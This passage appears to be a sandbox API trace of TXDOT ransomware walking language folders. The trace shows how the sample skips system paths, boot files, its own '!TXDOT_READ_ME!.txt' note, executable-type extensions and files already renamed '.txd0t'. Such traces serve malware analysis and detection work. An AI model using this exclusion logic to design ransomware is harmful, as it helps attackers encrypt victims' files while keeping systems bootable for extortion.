ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1055", cAlternateFileName="")) returned 1 [0116.324] StrCmpW (psz1="1055", psz2=".") returned 1 [0116.324] StrCmpW (psz1="1055", psz2="..") returned 1 [0116.324] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.324] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.324] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1055", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system32\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\local\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\boot\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\perflogs\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\programdata\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\drivers\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\wsus\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="crypt_detect") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="cryptolocker") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="ransomware") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\WINDOWS") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.324] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files") returned 0x0 [0116.324] GetProcessHeap () returned 0xe30000 [0116.324] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.324] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0116.324] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\*") returned="C:\\588bce7c90097ed212\\1055\\*" [0116.324] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1eb0 [0116.325] StrCmpW (psz1=".", psz2=".") returned 0 [0116.325] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58baf75f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.325] StrCmpW (psz1="..", psz2=".") returned 1 [0116.325] StrCmpW (psz1="..", psz2="..") returned 0 [0116.325] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a0bd71, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58a0bd71, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58a583d5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.325] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.325] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.325] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0116.325] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0116.325] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1055\\!TXDOT_READ_ME!.txt" [0116.325] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.325] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.325] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.325] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x589e5c0d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1113, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.325] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.325] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.592] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0116.592] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0116.604] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1055\\eula.rtf.txd0t" [0116.604] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.605] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.605] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58baf75f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12e12, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.609] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.609] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.609] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0116.609] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0116.613] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.txd0t" [0116.613] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.613] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.617] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.617] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.617] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.617] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0116.622] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0116.634] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" [0116.634] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.634] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.637] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.637] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.637] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.637] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.638] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.638] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.650] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.650] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.650] FindClose (in: hFindFile=0xec1eb0 | out: hFindFile=0xec1eb0) returned 1 [0116.650] GetProcessHeap () returned 0xe30000 [0116.650] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.650] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0116.650] StrCmpW (psz1="2052", psz2=".") returned 1 [0116.650] StrCmpW (psz1="2052", psz2="..") returned 1 [0116.650] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.650] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.650] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2052", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0116.650] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system32\\") returned 0x0 [0116.650] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.650] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system\\") returned 0x0 [0116.650] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.650] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\local\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\boot\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\perflogs\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\programdata\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\drivers\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\wsus\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.655] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="crypt_detect") returned 0x0 [0116.659] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="cryptolocker") returned 0x0 [0116.659] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="ransomware") returned 0x0 [0116.659] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\WINDOWS") returned 0x0 [0116.659] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.659] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files") returned 0x0 [0116.659] GetProcessHeap () returned 0xe30000 [0116.659] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.663] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0116.667] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\*") returned="C:\\588bce7c90097ed212\\2052\\*" [0116.667] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1bf0 [0116.681] StrCmpW (psz1=".", psz2=".") returned 0 [0116.681] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.681] StrCmpW (psz1="..", psz2=".") returned 1 [0116.681] StrCmpW (psz1="..", psz2="..") returned 0 [0116.681] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c21df5, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58c21df5, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.681] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.681] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.682] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0116.685] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0116.686] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\2052\\!TXDOT_READ_ME!.txt" [0116.686] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.686] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.692] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.696] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.696] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.696] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.697] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.697] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.697] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.697] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.697] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.699] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.706] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.706] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.713] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58c21df5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18c3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.719] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.724] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.724] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0116.724] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0116.724] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t" [0116.724] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.724] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.724] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58c21df5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef0c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.724] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.724] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.724] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0116.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0116.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t" [0116.725] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.730] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.730] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, 